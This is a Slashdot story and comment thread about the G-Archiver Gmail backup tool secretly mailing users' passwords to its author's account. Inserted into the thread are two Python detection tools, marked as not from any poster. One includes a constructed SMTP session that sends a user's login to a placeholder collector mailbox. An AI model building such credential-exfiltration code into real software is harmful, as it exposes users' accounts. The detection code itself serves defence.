Slashdot: News for Nerds

G-Archiver Harvesting Google Mail Passwords

kdawson posted more than 6 years ago | from the change-password-now dept.

Security 462

Thwomp writes "It appears that a popular Gmail backup utility, G-Archiver, has been harvesting users' Gmail passwords. This was discovered when a developer named Dustin Brooks took a look at the code using a decompiler. He discovered a Gmail account name and password embedded in the source code. Brooks logged in and found over 1,700 emails all with user account information — with his own at the top. According to a story in Informationweek, he deleted the emails, changed the account password, and notified Google. The creator of G-Archiver has pulled the software, stating that it was debug code and was unintentionally left in the product."


462 comments

This is why I backup my Gmail with G-Archiver (5, Funny)

Anonymous Coward | more than 6 years ago | (#22719340)

Oh, wait...

Re:This is why I backup my Gmail with G-Archiver (1)

Brian Gordon (987471) | more than 6 years ago | (#22719398)

I've always thought those tools looked shady. Come on people, amazon s3 is not that expensive. Pony up.

Re:This is why I backup my Gmail with G-Archiver (4, Insightful)

afidel (530433) | more than 6 years ago | (#22719474)

Or simply use IMAP to archive your gmail account...

Re:This is why I backup my Gmail with G-Archiver (4, Insightful)

MBGMorden (803437) | more than 6 years ago | (#22719768)

You still have to trust the IMAP client to not be logging your passwords. It all comes down to whether or not you trust where the software came from. Luckily for open source projects there's an easy audit trail (so long as you compile from that source - a premade binary distributed with source could still contain malicious code simply not included in the provided source). For closed source software you're stuck trying arcane trickery like this guy did in order to find out when a program is spying on you.

Re:This is why I backup my Gmail with G-Archiver (4, Insightful)

Hatta (162192) | more than 6 years ago | (#22719950)

For closed source software you're stuck trying arcane trickery like this guy did in order to find out when a program is spying on you.

The upshot of this case is that the app in question was written with .Net which is fairly easy to decompile [aisto.com]. If he had chosen C++, there's a good chance no one would have bothered to pore over the assembly and find this out.

Re:This is why I backup my Gmail with G-Archiver (3, Insightful)

mmkkbb (816035) | more than 6 years ago | (#22720034)

Sure, but someone could have checked the net activity just as easily.

Re:This is why I backup my Gmail with G-Archiver (-1)

Atlantis-Rising (857278) | more than 6 years ago | (#22720014)

It's only 'easy' if your time has no value and you're competent to examine the source, which I would say the vast majority if not 99.9999% of people aren't.

Rather, you're much better off running a strong firewall that's not the same piece of software or hardware at the boundary of your network which will pick up on nasty things you haven't asked to be run; alternatively, you can run a packet sniffer and keep an eye on what the software is sending across the network (and unless the software has got a built-in ansible, that should be good enough for almost all applications.)
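A defender-side version of the "watch what the software is sending" check above, added here as an example that is not from any poster: it walks a capture of an application's outbound connections, reports anything that is not plain mail retrieval, and flags payloads that carry the user's own password in the clear or base64-encoded, which is how it would appear in SMTP AUTH PLAIN or a base64 message body. It assumes you can see the application's traffic in the clear (a local intercepting proxy, or a test server), and the hostnames, account names and capture are constructed placeholders.

```python
import base64
from dataclasses import dataclass

# Where a Gmail *backup* tool is expected to connect: mail retrieval only.
# These endpoints are assumptions for the example, not from the original story.
EXPECTED_RETRIEVAL = {("imap.gmail.com", 993), ("pop.gmail.com", 995)}


@dataclass
class Connection:
    """One outbound connection, with its payload as seen in plaintext."""
    dst_host: str
    dst_port: int
    payload: bytes


def base64_fragments(secret: bytes):
    """Yield the base64 fragments that must appear whenever `secret` is embedded
    in a base64 stream, one per 3-byte alignment. Leading and trailing
    characters that also encode neighbouring bytes are dropped, so each
    fragment matches regardless of what surrounds the secret (this covers
    SMTP AUTH PLAIN, which sends base64("\\0user\\0pass"), and base64 bodies).
    Dropping the partial last character means a secret that differs only in
    the low bits of its final byte also matches; fine for a detector."""
    for pad_len in range(3):
        enc = base64.b64encode(b"\0" * pad_len + secret).decode().rstrip("=")
        head = (0, 2, 3)[pad_len]          # chars contaminated by the pad bytes
        tail = 0 if (pad_len + len(secret)) % 3 == 0 else 1  # partial last group
        yield enc[head:len(enc) - tail].encode()


def credential_patterns(password: str) -> list:
    """Plain and base64 forms of the password to look for in outbound data."""
    raw = password.encode()
    return [raw] + list(base64_fragments(raw))


def audit_outbound(connections, password: str) -> list:
    """Report every connection that is not plain mail retrieval, and mark
    those whose payload carries the user's password in any form.
    Retrieval connections legitimately carry the password in the login
    exchange and are therefore not reported."""
    patterns = credential_patterns(password)
    findings = []
    for c in connections:
        if (c.dst_host, c.dst_port) in EXPECTED_RETRIEVAL:
            continue
        leaks = any(p in c.payload for p in patterns)
        kind = "CREDENTIAL EXFILTRATION" if leaks else "unexpected destination"
        findings.append((kind, f"{c.dst_host}:{c.dst_port}"))
    return findings


def smtp_session(harvest_account: str, user: str, password: str) -> bytes:
    """Constructed client side of an SMTP exchange in which the tool mails the
    user's login to a hard-coded collector mailbox (placeholder names)."""
    auth = base64.b64encode(f"\0{harvest_account}\0collector-pw".encode()).decode()
    body = base64.b64encode(f"user={user} pw={password}".encode()).decode()
    return (
        f"EHLO backup-tool\r\nAUTH PLAIN {auth}\r\n"
        f"MAIL FROM:<{harvest_account}>\r\nRCPT TO:<{harvest_account}>\r\n"
        f"DATA\r\nSubject: {user} / {password}\r\n"
        f"Content-Transfer-Encoding: base64\r\n\r\n{body}\r\n.\r\n"
    ).encode()


# Constructed sample capture (not real traffic): the user's own IMAP login,
# the tool mailing that login away, and an innocuous version check.
USER, PASSWORD = "alice@example.invalid", "hunter2"
SAMPLE_CAPTURE = [
    Connection("imap.gmail.com", 993, f"a1 LOGIN {USER} {PASSWORD}\r\n".encode()),
    Connection("smtp.gmail.com", 465, smtp_session("collector@example.invalid", USER, PASSWORD)),
    Connection("updates.example.invalid", 443, b"GET /version HTTP/1.1\r\n"),
]

if __name__ == "__main__":
    for kind, where in audit_outbound(SAMPLE_CAPTURE, PASSWORD):
        print(f"{kind}: {where}")
```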

Re:This is why I backup my Gmail with G-Archiver (1)

maxume (22995) | more than 6 years ago | (#22719530)

G-Archiver works in the other direction. The idea is to back up your Gmail account, not to back up to your Gmail account.

Seriously, (1)

an.echte.trilingue (1063180) | more than 6 years ago | (#22719882)

Seriously, though, this is why I use the greasemonkey extension [mozilla.org] for firefox to do things like this. It allows you to add your own javascript to certain web pages. For example, the better gmail [mozilla.org] set of scripts provides a variety of enhancements, and there is a tool that lets you add a bcc to every mail (which is how I back up my sent mail).

The best part is that all the scripts are javascript, so even if you have the most rudimentary understanding of just about any programming language, you can easily figure out what the scripts are doing. No decompiling or reverse engineering needed.

Although I risk sounding like an ideologue for saying this, this once again shows how open source programs are inherently more secure than closed source.

Debug, Sure (5, Insightful)

Archangel Michael (180766) | more than 6 years ago | (#22719356)

"The creator of G-Archiver has pulled the software, stating that it was debug code and was unintentionally left in [CC] the product."

Right. And I have a bridge I'd like to sell you too.

Re:Debug, Sure (5, Funny)

tristian_was_here (865394) | more than 6 years ago | (#22719482)

I did something similar. I once picked up the wrong keys, yet when I went to take them back to the person, I decided to let myself in and accidentally walked out with a new TV.

Re:Debug, Sure (2, Interesting)

OptimusPaul (940627) | more than 6 years ago | (#22719590)

I actually did something like that accidentally. I enabled debug logging on a server and later noticed that it was logging usernames and passwords for all users on the system. It wasn't my code that was logging the names and it took me a week to find where it was being done and disable it.

Re:Debug, Sure... Around 1999 I found this out (4, Interesting)

davidsyes (765062) | more than 6 years ago | (#22720004)

by using a protocol analyzer to recover my OWN login and password for my side of the company's intranet. Turned out that the web software we used (can't remember the name, but it was not front phage, but it was indeed popular at the time) was harvesting or retaining ALL USER ACCOUNTS names and passwords. I became scared shitless because I was not sure how IT would feel. But I was former IT in the company and felt obligated to warn them that the vendor was conducting shitty coding processes and put not only OUR company at risk but other companies as well. If they had any diagnostic or call-home code in their web site building software, then potentially a corrupt employee in their company could gain some limited or full access to many companies' intranets if they gained physical access to the building. And, we all know about piggy-backing, where thieves waltzed in behind other employees, then proceeded to lift laptops, purses, keys, wallets, documents, whatever they could steal.

DAMN, I wish I could recall the name. I may ..

Here we go... I'm PRETTY damned sure it was NetObjects Fusion. Just googled "Year 1999 web building applications intranet web" and they were at the top of the list... I preferred it over front phage, but...

And, now that I Google "Year 1999 protocol analyzer sniffer packet" it seems to refresh my memory that I am PRETTY sure Sniffer Basic was the tool I used.

Of course, after that I never used any such tool on the LAN. But, being formerly in the IT department, and knowing what to look out for to help the company probably kept me out of trouble.

Re:Debug, Sure (5, Funny)

Anonymous Coward | more than 6 years ago | (#22719580)

Right. And I have a bridge I'd like to sell you too.

Why do you feel the need to hurt the reputation and business of us legitimate bridge sellers?!?

Re:Debug, Sure (1)

Brian Gordon (987471) | more than 6 years ago | (#22719774)

Snake oil has legitimate medical uses!

Re:Debug, Sure (2, Funny)

countSudoku() (1047544) | more than 6 years ago | (#22719878)

And if he had nothing to hide, why was he trying to protect his password? People who use passwords are trying to hide something. I say leave open your accounts just in case the FBI or CIA need to check to make sure you're not a terroristo!!1!

Re:Debug, Sure (1)

Trillan (597339) | more than 6 years ago | (#22719758)

Is it a bridge between my IMAP server and teh interwebs? If so, oh boy oh boy, how much?!?

A-ha! (3, Interesting)

ccguy (1116865) | more than 6 years ago | (#22719388)

Maybe _this_ is why I'm getting more spam in my gmail account lately?
If it isn't, surely someone had a boner after reading the article and is coding as we speak...

Re:A-ha! (5, Funny)

Roofus (15591) | more than 6 years ago | (#22719714)

Yeah, I was logged into your account and noticed that too....very strange!

Re:A-ha! (0, Offtopic)

Dr. Eggman (932300) | more than 6 years ago | (#22719860)

Nah, I have G-mail but don't use G-Archiver and I've seen an upsurge in spam too. I think it has to do with Google Captcha cracked [slashdot.org] recently. Mass mailing from gmail to gmail might be trusted more? I don't know, I'm not too strong in that area...

That doesn't make sense. (5, Insightful)

RandoX (828285) | more than 6 years ago | (#22719406)

If you're debugging, you already have the account details. What possible reason could you have to email them to yourself?

Re:That doesn't make sense. (2, Interesting)

Galactic Dominator (944134) | more than 6 years ago | (#22719742)

Not if you're debugging the authentication process. I don't know the particulars of this project, but it's at least conceivable a hash wasn't processed correctly, or some other auth error. I don't think that this was some oversight, however.

Plausible but unlikely.

Re:That doesn't make sense. (1)

Anonymous Coward | more than 6 years ago | (#22719762)

What I don't get is how a 'popular' tool only has ~1750 users. Different definition of popular?

Hmmm (5, Funny)

Anonymous Coward | more than 6 years ago | (#22719410)

he deleted the emails
But did he make a backup first?

Re:Hmmm (5, Insightful)

jeepee (607566) | more than 6 years ago | (#22720024)

he deleted the emails
But did he make a backup first?

He tried but it caused an infinite loop.

Trust me, trust me not. (2, Interesting)

bruce_the_loon (856617) | more than 6 years ago | (#22719416)

Trust me, trust me not, trust me, trust me not.

Oh damn, there goes my password.

Do you believe the developer? What debug code needs to send an email containing user account information?

Re:Trust me, trust me not. (4, Insightful)

Z00L00K (682162) | more than 6 years ago | (#22719642)

I don't believe that for a moment.

This seems to be a clear case of privacy invasion and unauthorized access to private data. And I think that this should have been brought to the attention of the police for further investigation.

In this case the guilty will have time to cover his tracks and hide.

Try this approach the next time you see something as grave as this. The worst thing that can happen if you report it is that the case gets dismissed.

DMCA (5, Insightful)

yohaas (228469) | more than 6 years ago | (#22719424)

If this was a big company, they would have denied it and gone after him under the DMCA. At least they admitted to something and pulled the product.

Re:DMCA (1)

Lao-Tzu (12740) | more than 6 years ago | (#22719734)

What does copyright have to do with this?

Re:DMCA (1)

Arthur B. (806360) | more than 6 years ago | (#22719814)

The software is copyrighted, duh.

Re:DMCA (2, Insightful)

yohaas (228469) | more than 6 years ago | (#22719872)

He reverse engineered the program, that would probably be banned under the DMCA. http://www.chillingeffects.org/reverse/ [chillingeffects.org]

Even the courts aren't this daft (4, Insightful)

MikeRT (947531) | more than 6 years ago | (#22719426)

You don't have to work in IT to know that there is no reason for G-Archiver to send the password to anyone but Google. This guy deserves to be prosecuted under anti-hacking statutes.

Re:Even the courts aren't this daft (5, Funny)

WPIDalamar (122110) | more than 6 years ago | (#22719476)

It only did send them to Gmail :)

Re:Even the courts aren't this daft (1)

Dionysus (12737) | more than 6 years ago | (#22719544)

You don't have to work in IT to know that there is no reason for G-Archiver to send the password to anyone but Google.

Why would the program need to send the password to anyone at all? It's an email archiver. All it needs to do is log in and pull the email. No need to mail the username/password combination at all.

Re:Even the courts aren't this daft (1)

MoonBuggy (611105) | more than 6 years ago | (#22719954)

Send as in transmit, not as in email - you can't log in at all if the application doesn't pass on the username/password.

Re:Even the courts aren't this daft (5, Funny)

Zordak (123132) | more than 6 years ago | (#22719612)

This guy deserves to be prosecuted under anti-hacking statutes.
Exactly. I mean, he was using a debugger! Doesn't he know that violates the DMCA? No doubt he'll be hearing from the G-Archiver lawyers AND the DoJ soon. It's time to show this clown that, in America, we don't put up with these kinds of shenanigans. And somebody call the copyright lobby. This is exactly the story they've been looking for to justify increasing the penalties for violating copyright to capital punishment.

Re:Even the courts aren't this daft (-1, Redundant)

MBGMorden (803437) | more than 6 years ago | (#22719662)

I think by "this guy" he was referring to the author of G-Archiver, not the person who discovered the problem.

Re:Even the courts aren't this daft (2, Funny)

Zordak (123132) | more than 6 years ago | (#22719732)

Hmmm, maybe I should have used explicit sarcasm tags.

Re:Even the courts aren't this daft (0)

Anonymous Coward | more than 6 years ago | (#22719914)

Sarcasm is not a synonym for stupid.

Re:Even the courts aren't this daft (1)

Rhabarber (1020311) | more than 6 years ago | (#22719952)

I think parent was meant to be funny. Hm, it actually is. Stupid, I don't have mod points.

Re:Even the courts aren't this daft (4, Informative)

Z00L00K (682162) | more than 6 years ago | (#22719972)

I actually found a few links that should be useful in cases like this: Of course you may have your own national version of IT incident reporting.

So if we really want to avoid having the police hunt us for petty crimes of downloading files - give them something real. :-)

Nice move, but illegal? (4, Insightful)

RandoX (828285) | more than 6 years ago | (#22719446)

Good intentions and all, but I'm sure Mr. Brooks just opened himself up to "hacking" charges.

Re:Nice move, but illegal? (5, Insightful)

San-LC (1104027) | more than 6 years ago | (#22719652)

Possibly by some ridiculous interpretation of the law, Mr. Brooks was "hacking." However, he purchased the rights to use G-Archiver, and he did not recompile the program in a different way and label it his own. He used information that the program (to which he has the rights to use, unless otherwise stated in some bullsheet EULA) used, found out that this program acted like a Trojan virus and submitted private information to an individual's e-mail account, and subsequently removed his information and disallowed any new information to be read.

Granted, he probably shouldn't have deleted everything and changed the password (morally: yes, legally: no), so it's likely he may face charges because of this. That's our legal system, folks.

Caught (4, Funny)

Itninja (937614) | more than 6 years ago | (#22719450)

Looks like someone got caught with their pants down in the cookie jar. That's not nearly as hot as it sounds.

Re:Caught (1)

InvisblePinkUnicorn (1126837) | more than 6 years ago | (#22719522)

"caught with their pants down in the cookie jar"

How does that work? Are their pants down in(side) the cookie jar, or are they physically standing inside some freak monster cookie jar, with their pants down?

Re:Caught (1)

Sciros (986030) | more than 6 years ago | (#22719880)

It's probably more like "with their pants down" AND "in the cookie jar." Then it makes sense.

Re:Caught (1)

gEvil (beta) (945888) | more than 6 years ago | (#22719640)

Is that better or worse than being caught with your hands down your pants in the cookie jar?

Re:Caught (0)

Anonymous Coward | more than 6 years ago | (#22719712)

Looks like someone got caught with their pants down in the cookie jar.
Either you got the quote wrong...or you REALLY enjoy your cookies...

Re:Caught (1)

San-LC (1104027) | more than 6 years ago | (#22719740)

...well, the cookie I was going to have for lunch DID look appealing before reading that post.


I guess I will just have the cake instead. At least I know THAT won't be a lie.

Re:Caught (1)

gEvil (beta) (945888) | more than 6 years ago | (#22719806)

The cake is alive!

Re:Caught (1)

Shados (741919) | more than 6 years ago | (#22719810)

One thing that makes me wonder about it. Any half-assed programmer knows that literals are easy to notice in a hex editor, or with a decompiler. If someone with an automatic decompiler was able to look at the output and find something suspicious, it means it really wasn't obfuscated or hidden really well... So the guy would have known he ran a high risk of getting caught.

I'm unfamiliar with the tool really, but I'd be guessing it's not really aimed at the "Click Here for Free Smilies!!!" crowd... so that was a very poor move to do something this easily noticed...

So either way, it's incompetence: either he mistakenly left debug code in, or he did the worst attempt at spyware in history.
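Shados's point that literals stand out in a hex editor or decompiler, turned into an added example that is not from any poster: a scanner that pulls printable runs out of a binary in ASCII and in UTF-16LE (how .NET stores string literals) and flags e-mail addresses, mail-server hostnames, password-like words, and whatever literal is stored right after an address, since a hard-coded credential usually sits next to its account name. The assembly blob, the address and the password in it are constructed placeholders.

```python
import re
from dataclasses import dataclass, field

MIN_LEN = 6
# Printable runs in ASCII, and in UTF-16LE (each char followed by a zero
# byte), which is how .NET stores string literals in an assembly's #US heap.
ASCII_RUN = re.compile(rb"[\x20-\x7e]{%d,}" % MIN_LEN)
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % MIN_LEN)

EMAIL = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
MAIL_HOST = re.compile(r"\b(?:smtp|imap|pop3?)\.[A-Za-z0-9.-]+", re.I)
SECRET_HINT = re.compile(r"pass(?:word|wd)?|pwd|secret|token", re.I)
NEIGHBOUR_GAP = 64  # max bytes between an address and the literal paired with it


@dataclass
class Literal:
    offset: int
    encoding: str
    text: str
    reasons: list = field(default_factory=list)


def extract_literals(blob: bytes) -> list:
    """All printable runs in both encodings, sorted by file offset."""
    found = [Literal(m.start(), "ascii", m.group().decode("ascii"))
             for m in ASCII_RUN.finditer(blob)]
    found += [Literal(m.start(), "utf-16le", m.group().decode("utf-16le"))
              for m in UTF16_RUN.finditer(blob)]
    return sorted(found, key=lambda lit: lit.offset)


def flag_literals(blob: bytes) -> list:
    """Return the literals worth a human look, each with its reason(s):
    an e-mail address, a mail-server hostname, a password-like keyword, or
    a literal stored immediately after an address in the same encoding."""
    lits = extract_literals(blob)
    for i, lit in enumerate(lits):
        addr = EMAIL.search(lit.text)
        if addr:
            lit.reasons.append("email-address")
            width = 2 if lit.encoding == "utf-16le" else 1
            end = lit.offset + len(lit.text) * width
            # Only the very next literal in the same encoding is paired.
            for nxt in lits[i + 1:]:
                if nxt.encoding != lit.encoding:
                    continue
                if nxt.offset - end <= NEIGHBOUR_GAP:
                    nxt.reasons.append(f"next-to-address:{addr.group()}")
                break
        if MAIL_HOST.search(lit.text):
            lit.reasons.append("mail-server")
        if SECRET_HINT.search(lit.text):
            lit.reasons.append("secret-hint")
    return [lit for lit in lits if lit.reasons]


def u16(s: str) -> bytes:
    return s.encode("utf-16le")


# Constructed stand-in for an assembly (not a real binary): opaque filler
# around a UTF-16LE address and the literal stored next to it, plus two
# ASCII strings. The address and password are placeholders.
SAMPLE_BLOB = (
    bytes(range(16)) * 2
    + u16("collector@example.invalid") + b"\x00\x00\x17"
    + u16("Tr0ub4dor&3") + b"\x00\x00"
    + bytes([0x90, 0x01, 0x7f, 0x00]) * 4
    + b"smtp.gmail.com\x00Backing up mailbox...\x00"
    + bytes(range(0xf0, 0x100))
)

if __name__ == "__main__":
    for lit in flag_literals(SAMPLE_BLOB):
        print(f"{lit.offset:#06x} {lit.encoding:9} {lit.text!r:35} {', '.join(lit.reasons)}")
```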

Re:Caught (1)

Seiruu (808321) | more than 6 years ago | (#22719890)

I wouldn't call gaining the login information of 1.7k gmail accounts 'the worst attempt at spyware in history'. As long as there are results, it may not be bad to play the fool. They can easily run away with an excuse going "look, it wasn't even hidden well, it was an honest mistake". I mean, they at least seem to have fooled you.

Emailing them to yourself? (1)

webword (82711) | more than 6 years ago | (#22719480)

...and if you email usernames and passwords to yourself -- like many folks do -- man, you are looking to get punished like this. This is especially true if you use public terminals.

(I know, I know. Not the same thing. Still...)

Gmail Backups? (3, Interesting)

techpawn (969834) | more than 6 years ago | (#22719484)

You have 6.5 gig of space on redundant remote servers. What are you backing up? Perhaps I do not understand what this application does and who needs it...

Re:Gmail Backups? (2, Informative)

fyrie (604735) | more than 6 years ago | (#22719554)

It's useful in case your account gets stolen, or if it ever gets deleted by accident (it's happened to gmail users before).

Re:Gmail Backups? (2, Insightful)

Tony Hoyle (11698) | more than 6 years ago | (#22719694)

Of course using this software virtually guarantees that your account *will* be stolen, because the author 'accidentally' kept a record of your username/password 'for backup purposes'.

Re:Gmail Backups? (1)

squeeze69 (756427) | more than 6 years ago | (#22719802)

And, simply using a pop3 or imap4 compliant program to download all of the mail? The contacts could be exported by hand.

Re:Gmail Backups? (4, Informative)

Arccot (1115809) | more than 6 years ago | (#22720010)

You have 6.5 gig of space on redundant remote servers. What are you backing up? Perhaps I do not understand what this application does and who needs it...
Gmail has been known to shut down accounts without notice or any chance of reversal. It's prudent to have a copy of your own data at all times, no matter how secure you think someone else is storing it.

Never ascribe to malice (5, Insightful)

Pope (17780) | more than 6 years ago | (#22719502)

what can be explained by incompetance?

Although in this case, that's some serious incompetance going on!

Re:Never ascribe to malice (0)

Anonymous Coward | more than 6 years ago | (#22719572)

Never ascribe to poor spelling what can be explained by idiocy.

Come on... incompetance? Doesn't your web browser underscore the idiotically misspelled word?

Re:Never ascribe to malice (1)

cpu_fusion (705735) | more than 6 years ago | (#22719648)

> "Never ascribe to malice what can be explained by incompetence"

It could be incompetence in this case ... but that saying holds little wisdom, in my opinion.

There are plenty of competent, malicious criminals out there. In fact, some of them are called Politicians.

Re:Never ascribe to malice (1)

swordgeek (112599) | more than 6 years ago | (#22719704)

Occam's Razor trumps Hanlon's Razor.

Don't give out passwords (4, Insightful)

Todd Knarr (15451) | more than 6 years ago | (#22719528)

And this, children, is why you should never ever give the password to your account to someone else. Not even someone who claims to want to do something for you. Once you've given it to them, you have no control over what they do with it.

Re:Don't give out passwords (1)

mrzaph0d (25646) | more than 6 years ago | (#22719964)

That's why I always change my password when using utilities like these. Although I'm going to stop using them 'cause they never work..

Almost Willing To Believe (2, Informative)

_bug_ (112702) | more than 6 years ago | (#22719532)

I'm almost willing to believe the G-Archiver excuse that it's debug code. From the screenshots posted online of the inbox (before it was deleted) I only see e-mails marked as unread. If the entire inbox is filled with unread e-mails then I'm willing to believe it was a throw-away e-mail account used for testing/debugging. Also this kind of "bug" seems really blatant and certainly headed for an easy discovery. I'd expect a more obfuscated means of transmitting the username and password, were one so inclined to bug the software.

However 1,777 seems a bit small for "popular software" if this represents every install since the bugged software was released. Furthermore, how does e-mailing a password to a random account help in debugging the software?

I'm almost willing to believe in human stupidity as the reason this happened, but not quite.

Re:Almost Willing To Believe (1)

Mongoose Disciple (722373) | more than 6 years ago | (#22719664)

I'm with you there. All developers have sent code to production unintentionally, and just reading the summary I thought to myself, I probably have made that kind of mistake before, maybe this is innocent.

It's reading the story and seeing all the details that makes it just not add up to me.

No reason to read the body of the emails... (1, Insightful)

Anonymous Coward | more than 6 years ago | (#22719680)

There was no reason to read the emails as the username and password skimmed are in the subject line.

Re:Almost Willing To Believe (1)

Translation Error (1176675) | more than 6 years ago | (#22719682)

The emails would still be marked unread in Gmail if they've been accessed via POP.

Re:Almost Willing To Believe (1)

despe666 (802244) | more than 6 years ago | (#22719738)

Of course they're all unread, all the info is right there in the subject line, I'm willing to bet the body of the message was empty.

Anyone with 2 bits of knowledge about programming knows that there are much easier ways to debug than this, like, I don't know, using a debugger?

Re:Almost Willing To Believe (1)

u38cg (607297) | more than 6 years ago | (#22719764)

"Select all conversations in inbox"

"Mark as unread"

Not too hard, though I'd agree that if this was deliberate, I would expect it to be a bit more obfuscated than that...

Re:Almost Willing To Believe (0)

Anonymous Coward | more than 6 years ago | (#22719782)

He could be using a POP3 client to download those messages and they would still be marked as unread.

It doesn't make any sense why you'd need anything like that for any sort of debugging purpose, but the garchiver site and the owner matemediainc.com (russmedia.com) don't look that bad, even if they are "SEO" consultants.

I'm leaning more towards it wasn't intended for malicious reasons, but they screwed up big time and will probably never sell another license of garchiver. I hope the "developers" name gets leaked somewhere, he deserves to never get another job coding ever again. Time for that no talent hack to get a job testing his mental abilities. I hear Burger King is always looking for someone to work cleanup crew.

That REALLY doesn't make sense (2, Interesting)

fph il quozientatore (971015) | more than 6 years ago | (#22719550)

Suppose you want to harvest all users' emails by simply mailing them to your own account. Why on h^Hearth do you need the password of this account to be written in the source code?

Re:That REALLY doesn't make sense (1)

peragrin (659227) | more than 6 years ago | (#22719710)

Because that was part of the test code. He hard-coded in a sample G-Archiver account username and password. Why it sent the username and password to a particular account is the better question.

Is this for or against Open Source? (1)

Seiruu (808321) | more than 6 years ago | (#22719570)

For: Everybody can check the source.

Against:
(1) But because most users/people generally are not qualified to do so, there is a significant risk of damage being done already by the time the qualified users/people do.
(2) IT quacks can cause such loopholes and there really aren't many, if any at all, people around to be accountable for it.

Sucky blow for OS.

Re:Is this for or against Open Source? (1)

sdsucks (1161899) | more than 6 years ago | (#22719876)

I'd say for open source... and I don't see how it can be against it. At the very least it's neutral IMO.

1) A third party usually looks at open source software, and if something like this was found then word would get around fast. It doesn't require everyone who uses the software to be able to look for these problems.
(For example, on lesser known open source software the company I work for uses, we almost always take a look at the source.)

2) Not sure what your point is... Are you saying a malicious employee may more easily put something like this into the software if it is OS? If so, well, most "IT quacks" in that position have many ways to achieve the same goals.

Just wondering... (5, Interesting)

Doodhwala (13342) | more than 6 years ago | (#22719576)


So why did the binary program also have the password for the gmail account? One would assume that the email address would have been enough. After all, sending someone email doesn't require their password.

Re:Just wondering... (1)

Shados (741919) | more than 6 years ago | (#22719618)

To do a lookup to see if the email was received. Common stuff when debugging email sending software.

Re:Just wondering... (1, Informative)

Anonymous Coward | more than 6 years ago | (#22719824)

Or, to ensure that it doesn't end up in any unfortunate sent items folders.

Re:Just wondering... (1)

SpaceLifeForm (228190) | more than 6 years ago | (#22719874)

If you are debugging, you could just login through a browser and check.

Re:Just wondering... (4, Informative)

karmaflux (148909) | more than 6 years ago | (#22719962)

GMail requires you to authenticate with their SMTP servers to send mail. His choices were to include the account password, implement his own SMTP server and build it into the program, or use an open SMTP server. That last will often get your mail dropped as spam. The second one would have been better-secured, but the guy was obviously dumb enough to include a phishing function in a backup program, so it's obvious why he went with option number one.

Re:Just wondering... (1)

sdsucks (1161899) | more than 6 years ago | (#22720026)

Possibly for some kind of SMTP authentication.

Good point against closed source software. (1)

sdsucks (1161899) | more than 6 years ago | (#22719594)

Just sayin'..

Also, I'd be very surprised if this wasn't intentional. Not likely "debug" code.

In perspective, this isn't much (1)

bugnuts (94678) | more than 6 years ago | (#22719608)

1700+ email accounts isn't much, considering the volume of gmail. And then those accounts would have to be able to be linked to something, if one were to try to exploit it.

I'm really surprised it's sub-2000. Goes to show not many people use it.

Since the password of the email account was changed, it couldn't upload any further data either.

Re:In perspective, this isn't much (1)

ionymous (1216224) | more than 6 years ago | (#22719908)

Actually, if you look at the screen shot of the account [codinghorror.com] there are repeated messages.

Maybe G-Archiver sent a message every time it was launched or something.

So there are probably far fewer than 1700 accounts affected.

Also, if I were the guy who found this, I would have changed the password, then emailed everyone from the account to let them know what had happened. I suppose google could restore the messages so THEY can inform the owners.

what was that dude's name (2, Interesting)

rice_burners_suck (243660) | more than 6 years ago | (#22719626)

how about that guy who modified the login program to give him a backdoor hard-coded password and username? then he modified the compiler to recognize when it was compiling login and automatically insert the code, and deleted that code from login so it wouldn't be apparent in a code review. then he modified the compiler to recognize when it was compiling itself, and insert the code to modify both itself and login, and then deleted that code from the compiler as well. now there ain't no code to do that in the source code no more, but it does it anyway. eh?

likely story (1)

steffens (1050246) | more than 6 years ago | (#22719636)

I'm supposed to believe that some coder was logging passwords by accident? Right, and I'm just writing code for an online store and I just happen to be keeping copies of all CC #'s on my personal computer, just for debugging.

(Evil Laugh) Debugging straight to the bank!

Backup???? (2, Insightful)

spectrokid (660550) | more than 6 years ago | (#22719654)

Isn't the whole freakin point of GMail that you don't have to backup?

One thing strikes me (1)

mattpointblank (936343) | more than 6 years ago | (#22719752)

It would have been nice if the dude who uncovered this had emailed those concerned to let them know their accounts have been potentially violated. I use Gmail for 2 primary addresses and would like to know if my name was amongst the 1700 there. Deleting them all was good work but informing them too would have been nice (and probably not too hard).

Many Laws Broken, No Ethics (0)

Anonymous Coward | more than 6 years ago | (#22719754)

I am having trouble deciding who is more 'at fault' or who 'broke more laws'.

1. Logging in and DELETING the information can be considered a Criminal Offence. (two separate offences actually)

2. Changing the password, security question, etc, can be considered another one.

Who did the original email address belong to? Can it be traced to the author?

In other words, no due process of law, or even an attempt at contacting the author was made.

What we have here, is the typical IT person / programmer playing policeman, totally unacceptable.

No evidence of fraudulent activity, no attempt to contact the author, nothing, typical programmer/IT mentality, taking the law into their own hands.

Very nice that they had the ACM 'Code of Ethics' on their web site, they breached just about every rule.

Too bad there isn't a responsible body that BOTH parties could be reported to. Engineers would lose their license over this. Lucky they are just simple programmers.

Re:Many Laws Broken, No Ethics (2, Insightful)

MightyYar (622222) | more than 6 years ago | (#22720020)

What twisted, warped world do you live in where it is unethical to stop a crime-in-progress?

Let me be the first to say: (-1, Offtopic)

Anonymous Coward | more than 6 years ago | (#22719776)

FUCKING BOLLOCKS.

-:v:vv::vvv:::vvvv::::vvvvv::::vvvv:::vvv::vv:v:-

POP? (1)

Joao (155665) | more than 6 years ago | (#22719778)

Did they save a list of the accounts that had the password stolen? The scumba^k^k^k^k^k "programmer" could have already downloaded the messages via POP before the author changed the account's password.

Doesn't look malicious to me (5, Insightful)

Pogie (107471) | more than 6 years ago | (#22719828)

Maybe I'm getting old, but this seems like a pretty clear case of "oh crap, I'm an idiot", rather than "mwuahahah, my plan for global domination proceeds apace!". According to the posting on codinghorror, the guy who found the issue (Dustin Brooks) found that the creator, John Terry, of the G-Archiver software had left his own email information in the code. Yes, the G-archiver forwarded a record of the account information of everyone who used the app to that mailbox, but if you look at the screenshot, none of those emails has been flagged as read by gmail (but maybe that's an artifact of a POP connection?).

Either way, this just smacks to me of a novice developer doing something incredibly dumb, rather than incredibly malicious. If he actually wanted to just collect other people's account information, why leave his own in the source code? He could have just as easily forwarded the information to an anonymized email account, or simply an account for which the login information was not present in source.

Just my opinion, I reserve the right to be wrong.

Re:Doesn't look malicious to me (3, Insightful)

AdamTrace (255409) | more than 6 years ago | (#22719942)

I agree. There's a lot of high and mighty programmers here who are calling this guy "incompetent", but I'd be shocked if we haven't all accidentally sent debug code to production at some point or another.

